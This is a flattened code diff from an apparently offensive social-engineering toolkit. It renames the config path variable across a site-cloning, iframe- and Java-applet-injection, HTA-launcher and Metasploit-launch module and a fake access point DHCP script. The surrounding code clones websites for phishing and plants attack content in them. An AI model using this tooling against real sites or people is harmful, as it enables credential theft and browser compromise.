output.close() output.close()
filewrite1 = open(setdir + "/web_clone/index.html", "w") filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write( filewrite1.write(
'<head><script type="text/javascript" src="source.js"></script></head>\n') '<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1.write("<body>\n") filewrite1.write("<body>\n")
@ -79,7 +79,7 @@ if attack_vector == "tabnabbing":
# define webjacking or multi webjacking here # define webjacking or multi webjacking here
if attack_vector == "webjacking" or multi_webjacking == "on": if attack_vector == "webjacking" or multi_webjacking == "on":
filewrite1 = open(setdir + "/web_clone/index.html", "w") filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write("<script>\n") filewrite1.write("<script>\n")
filewrite1.write("function a(){\n") filewrite1.write("function a(){\n")
filewrite1.write( filewrite1.write(

98
src/webattack/web_clone/cloner.py
View file

@ -46,17 +46,17 @@ site_cloned = True
meterpreter_iframe = "8080" meterpreter_iframe = "8080"
# make dir if needed # make dir if needed
if not os.path.isdir(setdir + "/web_clone/"): if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(setdir + "/web_clone") os.makedirs(userconfigpath + "web_clone")
# if we used a proxy configuration from the set-proxy # if we used a proxy configuration from the set-proxy
if os.path.isfile(setdir + "/proxy.confg"): if os.path.isfile(userconfigpath + "proxy.confg"):
fileopen = open(setdir + "/proxy.config", "r") fileopen = open(userconfigpath + "proxy.config", "r")
proxy_config = fileopen.read().rstrip() proxy_config = fileopen.read().rstrip()
# just do a ls # just do a ls
if not os.path.isfile(setdir + "/proxy.confg"): if not os.path.isfile(userconfigpath + "proxy.confg"):
proxy_config = "ls" proxy_config = "ls"
# if counter == 0: web_port=80 # if counter == 0: web_port=80
@ -64,7 +64,7 @@ if not os.path.isfile(setdir + "/proxy.confg"):
webdav_meta = 0 webdav_meta = 0
# see if exploit requires webdav # see if exploit requires webdav
try: try:
fileopen = open(setdir + "/meta_config", "r") fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("set SRVPORT 80", line) match = re.search("set SRVPORT 80", line)
@ -77,7 +77,7 @@ except:
template = "" template = ""
# Grab custom or set defined # Grab custom or set defined
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("TEMPLATE=", line) match = re.search("TEMPLATE=", line)
@ -87,8 +87,8 @@ for line in fileopen:
# grab attack_vector specification # grab attack_vector specification
attack_vector = "" attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector", "r").readlines() fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
@ -108,7 +108,7 @@ update_options("APPLET_NAME=" + rand_gen_applet)
try: try:
# open our config file that was specified in SET # open our config file that was specified in SET
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here # start loop here
url_counter = 0 url_counter = 0
for line in fileopen: for line in fileopen:
@ -146,10 +146,10 @@ try:
if wget == 1: if wget == 1:
if check_config("WGET_DEEP").lower() == "on": if check_config("WGET_DEEP").lower() == "on":
subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' % subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' %
(proxy_config, setdir, user_agent, url), shell=True).wait() (proxy_config, userconfigpath, user_agent, url), shell=True).wait()
else: else:
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' % subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' %
(proxy_config, setdir, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() (proxy_config, userconfigpath, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
else: else:
# if we don't have wget installed we will use python to rip, # if we don't have wget installed we will use python to rip,
@ -169,7 +169,7 @@ try:
# if the site has cloned properly # if the site has cloned properly
site_cloned = True site_cloned = True
# open file for writing # open file for writing
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
# write the data back from the request # write the data back from the request
filewrite.write(html) filewrite.write(html)
# close the file # close the file
@ -181,18 +181,18 @@ try:
pass pass
# If the website did not clone properly, exit out. # If the website did not clone properly, exit out.
if not os.path.isfile(setdir + "/web_clone/index.html"): if not os.path.isfile(userconfigpath + "web_clone/index.html"):
print(( print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)) bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue() return_continue()
site_cloned = False site_cloned = False
# add file to let set interactive shell know it was unsuccessful # add file to let set interactive shell know it was unsuccessful
filewrite = open(setdir + "/cloner.failed", "w") filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed") filewrite.write("failed")
filewrite.close() filewrite.close()
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
counter = 0 counter = 0
for line in fileopen: for line in fileopen:
counter = counter + 1 counter = counter + 1
@ -201,27 +201,27 @@ try:
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)) bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue() return_continue()
site_cloned = False site_cloned = False
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
# add file to let set interactive shell know it was # add file to let set interactive shell know it was
# unsuccessful # unsuccessful
filewrite = open(setdir + "/cloner.failed", "w") filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed") filewrite.write("failed")
filewrite.close() filewrite.close()
if site_cloned == True: if site_cloned == True:
# make a backup of the site if needed # make a backup of the site if needed
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
setdir + "/web_clone/index.html.bak") userconfigpath + "web_clone/index.html.bak")
if site_cloned == True: if site_cloned == True:
# if we specify UNC embedding # if we specify UNC embedding
if unc_embed == True: if unc_embed == True:
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
index_database = fileopen.read() index_database = fileopen.read()
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
# Open the UNC EMBED # Open the UNC EMBED
fileopen4 = open("src/webattack/web_clone/unc.database", "r") fileopen4 = open("src/webattack/web_clone/unc.database", "r")
@ -243,7 +243,7 @@ try:
# check for java flag for multi attack # check for java flag for multi attack
multi_java = False multi_java = False
if os.path.isfile(setdir + "/multi_java"): if os.path.isfile(userconfigpath + "multi_java"):
multi_java = True multi_java = True
if attack_vector == "java" or multi_java: if attack_vector == "java" or multi_java:
@ -254,17 +254,17 @@ try:
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC)) bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
# Read in newly created index.html # Read in newly created index.html
time.sleep(2) time.sleep(2)
if not os.path.isfile(setdir + "/web_clone/index.html"): if not os.path.isfile(userconfigpath + "web_clone/index.html"):
# trigger error that we were unable to grab the website :( # trigger error that we were unable to grab the website :(
print_error( print_error(
"Unable to clone the website it appears. Email us to fix.") "Unable to clone the website it appears. Email us to fix.")
sys.exit() sys.exit()
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
# Read add-on for java applet # Read add-on for java applet
fileopen2 = open("src/webattack/web_clone/applet.database", "r") fileopen2 = open("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added # Write to new file with java applet added
filewrite = open(setdir + "/web_clone/index.html.new", "w") filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
fileopen3 = open("src/webattack/web_clone/repeater.database", "r") fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
# this is our cloned website # this is our cloned website
@ -368,31 +368,31 @@ try:
# if we are using HTA attack # if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA": if check_options("ATTACK_VECTOR") == "HTA":
if os.path.isfile(setdir + "/Launcher.hta"): if os.path.isfile(userconfigpath + "Launcher.hta"):
data1 = open(setdir + "/web_clone/index.html", "r").read() data1 = open(userconfigpath + "web_clone/index.html", "r").read()
data2 = open(setdir + "/hta_index", "r").read() data2 = open(userconfigpath + "hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>") data3 = data1.replace("</body>", data2 + "</body>")
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data3) filewrite.write(data3)
filewrite.close() filewrite.close()
print_status("Copying over files to Apache server...") print_status("Copying over files to Apache server...")
apache_dir = check_config("APACHE_DIRECTORY=") apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"): if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html" apache_dir = apache_dir + "/html"
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
apache_dir + "/index.html") apache_dir + "/index.html")
shutil.copyfile(setdir + "/Launcher.hta", shutil.copyfile(userconfigpath + "Launcher.hta",
apache_dir + "/Launcher.hta") apache_dir + "/Launcher.hta")
print_status("Launching Metapsloit.. Please wait one.") print_status("Launching Metapsloit.. Please wait one.")
subprocess.Popen("%smsfconsole -r %s/meta_config" % subprocess.Popen("%smsfconsole -r %s/meta_config" %
(meta_path(), setdir), shell=True).wait() (meta_path(), userconfigpath), shell=True).wait()
# selection of browser exploits # selection of browser exploits
# check to see if multiattack is in use # check to see if multiattack is in use
multi_meta = "off" multi_meta = "off"
if os.path.isfile(setdir + "/multi_meta"): if os.path.isfile(userconfigpath + "multi_meta"):
multi_meta = "on" multi_meta = "on"
if attack_vector == "browser" or multi_meta == "on": if attack_vector == "browser" or multi_meta == "on":
@ -400,19 +400,19 @@ try:
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC)) bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
# Read in newly created index.html # Read in newly created index.html
if attack_vector == "multiattack": if attack_vector == "multiattack":
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
# check to see if the file is there first # check to see if the file is there first
if not os.path.isfile(setdir + "/web_clone/index.html.new"): if not os.path.isfile(userconfigpath + "web_clone/index.html.new"):
if os.path.isfile(setdir + "/web_clone/index.html.bak"): if os.path.isfile(userconfigpath + "web_clone/index.html.bak"):
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/index.html.bak", setdir + "/web_clone/index.html.new") userconfigpath + "web_clone/index.html.bak", userconfigpath + "web_clone/index.html.new")
if os.path.isfile(setdir + "/web_clone/index.html.new"): if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/index.html.new", setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html.new", userconfigpath + "web_clone/index.html")
time.sleep(1) time.sleep(1)
fileopen = open(setdir + "/web_clone/index.html", "r").readlines() fileopen = open(userconfigpath + "web_clone/index.html", "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w") filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
counter = 0 counter = 0
for line in fileopen: for line in fileopen:
counter = 0 counter = 0
@ -449,13 +449,13 @@ try:
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC)) bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack": if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
if not os.path.isfile(setdir + "/web_clone/%s" % (rand_gen_applet)): if not os.path.isfile(userconfigpath + "web_clone/%s" % (rand_gen_applet)):
shutil.copyfile("src/html/Signed_Update.jar.orig", shutil.copyfile("src/html/Signed_Update.jar.orig",
setdir + "/web_clone/%s" % (rand_gen_applet)) userconfigpath + "web_clone/%s" % (rand_gen_applet))
# move index.html to our main website # move index.html to our main website
if os.path.isfile(setdir + "/web_clone/index.html.new"): if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.move(setdir + "/web_clone/index.html.new", shutil.move(userconfigpath + "web_clone/index.html.new",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
# catch keyboard control-c # catch keyboard control-c
except KeyboardInterrupt: except KeyboardInterrupt:

4
src/wireless/wifiattack.py
View file

@ -92,14 +92,14 @@ else:
if fakeap_dhcp_menu_choice == "1": if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1) filewrite.write(dhcp_config1)
dhcptun = 1 dhcptun = 1
if fakeap_dhcp_menu_choice == "2": if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2) filewrite.write(dhcp_config2)
dhcptun = 2 dhcptun = 2